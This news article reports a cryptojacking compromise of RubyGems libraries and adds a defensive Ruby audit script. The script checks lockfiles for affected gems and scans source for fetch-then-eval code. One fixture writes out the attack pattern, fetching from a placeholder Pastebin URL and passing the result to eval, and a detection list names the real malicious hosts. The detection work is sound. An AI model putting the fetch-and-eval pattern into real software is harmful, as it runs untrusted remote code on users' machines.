Cryptojacking malware has continued to evolve, and in the latest case it was planted in code libraries for the programming language Ruby. The malicious code, discovered by a security researcher on August 19, was published using the credentials of a rest-client maintainer whose RubyGems.org account had been compromised.
RubyGems is the package manager for Ruby libraries ("gems"); it allows developers to upload and share improvements to existing pieces of software. The RubyGems security team quickly removed the code, but not before it had exposed over 3,500 people, reported Decrypt.
The hackers first downloaded the software, infected it with the code and then uploaded it to RubyGems under new names. They targeted 11 of the most popular libraries. The infected libraries were downloaded over 3,500 times before the RubyGems team pulled down the offending gem version.
Five of the eleven were specific to crypto such as doge_coin, coin_base and blockchain_wallet, the latter two being the most popular downloads. According to the report, the infected version of coin_base was downloaded 424 times while blockchain_wallet was downloaded 423 times.
Once a user installed an infected library, it would download malicious code from a URL on Pastebin.com and execute it. Reportedly, that code in turn fetched instructions from yet another website, mironanoru.zzz.com.ua. Both the Pastebin URL and the website have since disappeared.
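The article describes two things a Ruby shop would want to check for: whether any of the named gems appear in a project's dependencies, and whether gem code follows the "fetch text from a remote URL, then eval it" pattern. The following is an added example, not code from the article or from the RubyGems team, that does both over a constructed Gemfile.lock and two constructed source snippets. The gem names and hostnames come from the article; the version numbers and the lockfile and source fixtures are placeholders made up for the demo.

```ruby
# Added example (not from the article): a small defender-side audit that
# (1) flags gems in a Gemfile.lock whose names the article reports as affected,
# and (2) scans gem source for the remote-fetch-then-eval pattern described.
require 'set'

# Gem names reported as affected. The article gives no version numbers, so this
# check is by name only; a real audit would also pin the known-bad versions.
AFFECTED_GEMS = %w[doge_coin coin_base blockchain_wallet].to_set.freeze

# Hosts the article names as part of the download-and-execute chain.
SUSPICIOUS_HOSTS = %w[pastebin.com mironanoru.zzz.com.ua].freeze

# Parse the "specs:" section of a Gemfile.lock into { name => version }.
# Direct specs are indented four spaces; their dependencies six, and are skipped.
def parse_lockfile(text)
  gems = {}
  in_specs = false
  text.each_line do |line|
    if line =~ /^\s+specs:\s*$/
      in_specs = true
      next
    end
    in_specs = false if line =~ /^\S/ # a new top-level section (PLATFORMS, ...)
    next unless in_specs
    if (m = line.match(/^ {4}(\S+) \(([^)]+)\)/))
      gems[m[1]] = m[2]
    end
  end
  gems
end

# Return only the locked gems whose names are on the affected list.
def flag_affected_gems(lockfile_text)
  parse_lockfile(lockfile_text).select { |name, _| AFFECTED_GEMS.include?(name) }
end

# Heuristic static scan of one source file. Reports (a) any reference to a
# suspicious host and (b) a remote fetch combined with eval-style execution.
def scan_source(src)
  findings = []
  hosts = SUSPICIOUS_HOSTS.select { |h| src.include?(h) }
  evals = src.scan(/\b(?:eval|instance_eval|class_eval|module_eval)\s*\(?/)
  fetch = src.match?(/\b(?:open\s*\(|URI\.open|Net::HTTP|OpenURI)/)
  findings << "references suspicious host(s): #{hosts.join(', ')}" unless hosts.empty?
  findings << "remote fetch followed by eval" if fetch && !evals.empty?
  findings
end

# Constructed lockfile fixture; versions are placeholders, not real releases.
SAMPLE_LOCKFILE = <<~'LOCK'
  GEM
    remote: https://rubygems.org/
    specs:
      coin_base (9.9.9)
        rest-client (>= 0)
      rake (13.0.1)
      rest-client (2.0.0)

  PLATFORMS
    ruby
LOCK

# Constructed snippet showing the pattern the article describes (placeholder URL).
SAMPLE_SUSPICIOUS = <<~'RUBY'
  require 'open-uri'
  code = URI.open("https://pastebin.com/raw/PLACEHOLDER").read
  eval(code)
RUBY

# Constructed benign snippet: a remote fetch with no code execution.
SAMPLE_BENIGN = <<~'RUBY'
  require 'net/http'
  body = Net::HTTP.get(URI("https://rubygems.org/api/v1/gems/rake.json"))
  puts body.length
RUBY

if __FILE__ == $0
  puts "affected gems in lockfile: #{flag_affected_gems(SAMPLE_LOCKFILE).inspect}"
  puts "suspicious snippet: #{scan_source(SAMPLE_SUSPICIOUS).inspect}"
  puts "benign snippet: #{scan_source(SAMPLE_BENIGN).inspect}"
end
```

The host and eval checks are deliberately coarse: a legitimate gem may fetch data over HTTP, and a legitimate gem may call eval, so only the combination is reported. Run it against each unpacked gem under `gem contents` or a vendored `gems/` directory, and treat a hit as a prompt for manual review rather than a verdict.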
The RubyGems team believes the effect of the infection was limited because the targeted series was old and had been suspended in 2014. The team has nevertheless released a new version of the targeted series so that those who continue to use it are still protected. It also promised to establish better security practices to prevent a recurrence, such as enabling two-factor authentication on RubyGems.org accounts.
Cryptojacking attacks have continued to be a nightmare for cyber security experts across the world. Earlier this year, the most popular cryptojacking tool, Coinhive, was shut down, which many thought would reduce the number of cryptojacking cases. Coinhive was believed to account for two-thirds of the cryptojacking market at the time. However, hackers have turned to other tools to continue their trade.
Earlier this month, Smominru cryptojacking malware was reported to have been updated and was believed to be stealing data from 500,000 infected machines. In March, Guardicore Labs reported that a new cryptojacking malware had infected over 50,000 servers. The malware was said to be infecting 700 new victims every day.